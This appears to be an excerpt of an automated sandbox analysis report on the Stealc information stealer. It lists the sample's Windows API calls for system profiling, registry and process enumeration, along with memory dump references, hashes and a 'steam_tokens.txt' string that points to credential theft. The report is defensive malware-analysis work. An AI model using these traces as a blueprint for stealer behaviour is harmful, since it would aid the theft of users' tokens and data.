                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,00CFFF80,00000000,?,00790E24,00000000,?,00000000,00000000,?,00CFF9F0,00000000,?,00790E20,00000000), ref: 0078207E
                                                                                                                                                                              • Part of subcall function 00789470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00789484
                                                                                                                                                                              • Part of subcall function 00789470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 007894A5
                                                                                                                                                                              • Part of subcall function 00789470: CloseHandle.KERNEL32(00000000), ref: 007894AF
                                                                                                                                                                              • Part of subcall function 00787E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00787E37
                                                                                                                                                                              • Part of subcall function 00787E00: HeapAlloc.KERNEL32(00000000), ref: 00787E3E
                                                                                                                                                                              • Part of subcall function 00787E00: RegOpenKeyExA.KERNEL32(80000002,00CF8410,00000000,00020119,?), ref: 00787E5E
                                                                                                                                                                              • Part of subcall function 00787E00: RegQueryValueExA.KERNEL32(?,00CFFFA0,00000000,00000000,000000FF,000000FF), ref: 00787E7F
                                                                                                                                                                              • Part of subcall function 00787E00: RegCloseKey.ADVAPI32(?), ref: 00787E92
                                                                                                                                                                              • Part of subcall function 00787F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00787FC9
                                                                                                                                                                              • Part of subcall function 00787F60: GetLastError.KERNEL32 ref: 00787FD8
                                                                                                                                                                              • Part of subcall function 00787ED0: GetSystemInfo.KERNEL32(00790E2C), ref: 00787F00
                                                                                                                                                                              • Part of subcall function 00787ED0: wsprintfA.USER32 ref: 00787F16
                                                                                                                                                                              • Part of subcall function 00788100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00CFF810,00000000,?,00790E2C,00000000,?,00000000), ref: 00788130
                                                                                                                                                                              • Part of subcall function 00788100: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00CFF810,00000000,?,00790E2C,00000000,?,00000000,00000000), ref: 00788137
                                                                                                                                                                              • Part of subcall function 00788100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00788158
                                                                                                                                                                              • Part of subcall function 00788100: __aulldiv.LIBCMT ref: 00788172
                                                                                                                                                                              • Part of subcall function 00788100: __aulldiv.LIBCMT ref: 00788180
                                                                                                                                                                              • Part of subcall function 00788100: wsprintfA.USER32 ref: 007881AC
                                                                                                                                                                              • Part of subcall function 007887C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00790E28,00000000,?), ref: 0078882F
                                                                                                                                                                              • Part of subcall function 007887C0: HeapAlloc.KERNEL32(00000000,?,?,?,?,00790E28,00000000,?), ref: 00788836
                                                                                                                                                                              • Part of subcall function 007887C0: wsprintfA.USER32 ref: 00788850
                                                                                                                                                                              • Part of subcall function 00788320: RegOpenKeyExA.KERNEL32(00000000,00CFDBC0,00000000,00020019,00000000,007905B6), ref: 007883A4
                                                                                                                                                                              • Part of subcall function 00788320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00788426
                                                                                                                                                                              • Part of subcall function 00788320: wsprintfA.USER32 ref: 00788459
                                                                                                                                                                              • Part of subcall function 00788320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0078847B
                                                                                                                                                                              • Part of subcall function 00788320: RegCloseKey.ADVAPI32(00000000), ref: 0078848C
                                                                                                                                                                              • Part of subcall function 00788320: RegCloseKey.ADVAPI32(00000000), ref: 00788499
                                                                                                                                                                              • Part of subcall function 00788680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007905B7), ref: 007886CA
                                                                                                                                                                              • Part of subcall function 00788680: Process32First.KERNEL32(?,00000128), ref: 007886DE
                                                                                                                                                                              • Part of subcall function 00788680: Process32Next.KERNEL32(?,00000128), ref: 007886F3
                                                                                                                                                                              • Part of subcall function 00788680: CloseHandle.KERNEL32(?), ref: 00788761
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0078265B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap$Process$Alloc$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$ComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2204142833-0
                                                                                                                                                                            • Opcode ID: 4544623851c26ac4c32506d07d1236abe3382c1122383fe447e0a77b349fdcdb
                                                                                                                                                                            • Instruction ID: 0d5a33086bc9cb05b4070e794efa69edae9511bde0da86ff0b69afa9e8269d36
                                                                                                                                                                            • Opcode Fuzzy Hash: 4544623851c26ac4c32506d07d1236abe3382c1122383fe447e0a77b349fdcdb
                                                                                                                                                                            • Instruction Fuzzy Hash: AF722E72C54118FAEB1AFB50DC9ADDE7378AF54300F5042AAB51662051EF3C3B4ACB66
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 0078A820: lstrlenA.KERNEL32(00000000,?,?,00785B54,00790ADB,00790ADA,?,?,00786B16,00000000,?,00CF1620,?,0079110C,?,00000000), ref: 0078A82B
                                                                                                                                                                              • Part of subcall function 0078A820: lstrcpy.KERNEL32(y,00000000), ref: 0078A885
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00790ACA,?,?,?,?,?,?,0078610B,?), ref: 0078512A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcpylstrlen
                                                                                                                                                                            • String ID: steam_tokens.txt
                                                                                                                                                                            • API String ID: 2001356338-401951677
                                                                                                                                                                            • Opcode ID: 9d9b9c884e52f8e9f5e9611f9bc1e1c5fbc02a248ba5c96f2a5b94c3bdc5153e
                                                                                                                                                                            • Instruction ID: e5406ecefd31d508e3072693617ff7d5d0665e44dc8e0b3c82b729477ed678c9
                                                                                                                                                                            • Opcode Fuzzy Hash: 9d9b9c884e52f8e9f5e9611f9bc1e1c5fbc02a248ba5c96f2a5b94c3bdc5153e
                                                                                                                                                                            • Instruction Fuzzy Hash: 84F0FB71990108B6EB08F7A4EC5B9ED733CAB54340F808269B41662492EF3C6619C7A3
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InfoSystemwsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2452939696-0
                                                                                                                                                                            • Opcode ID: 9547bf7ca5f995a7d0d2449a8e8ebc10692478ee9a6c98e05963ed68efd590a6
                                                                                                                                                                            • Instruction ID: 2e66a50aca8bd9c2436e189534e0dd9f127d446a303c242771f5e7488a040739
                                                                                                                                                                            • Opcode Fuzzy Hash: 9547bf7ca5f995a7d0d2449a8e8ebc10692478ee9a6c98e05963ed68efd590a6
                                                                                                                                                                            • Instruction Fuzzy Hash: 6AF062F1954208EBCB14DF85DD45FAAB7BCFB44624F004669F51592280D77959048BD1
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                              • Part of subcall function 00779E10: memcmp.MSVCRT(?,v20,00000003), ref: 00779E2D
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0077B9C2
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0077B9D6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcpy$lstrlen$lstrcat$memcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3457870978-0
                                                                                                                                                                            • Opcode ID: 9c0dd3bdd5388b5f250563361b92a638cf5b2a9607bb3100dfec23d6e1706d3e
                                                                                                                                                                            • Instruction ID: 0da46383500d4da820d65c97b3ccb3e8f7ea968bc89622435cf9e6a9a71dd747
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c0dd3bdd5388b5f250563361b92a638cf5b2a9607bb3100dfec23d6e1706d3e
                                                                                                                                                                            • Instruction Fuzzy Hash: A9E1CF72950118EAEF15FBA0DD9AEEE7378AF54300F40416AF50666091EF3C7A49CB72
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0077B16A
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0077B17E
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2500673778-0
                                                                                                                                                                            • Opcode ID: 513945b3b1ac5ad09760df728ba52d39425aace5c4452f27ff3c1a2115c4a9cc
                                                                                                                                                                            • Instruction ID: c2f37c2a21a1f6ec567132cada2bf5ed235d7d8c20511c844dd028d5575ed0df
                                                                                                                                                                            • Opcode Fuzzy Hash: 513945b3b1ac5ad09760df728ba52d39425aace5c4452f27ff3c1a2115c4a9cc
                                                                                                                                                                            • Instruction Fuzzy Hash: CC910371950118EBEF05FBA0DD9ADEE7378AF54300F40416AF516A6091EF3C6A09CBB2
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0077B42E
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0077B442
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
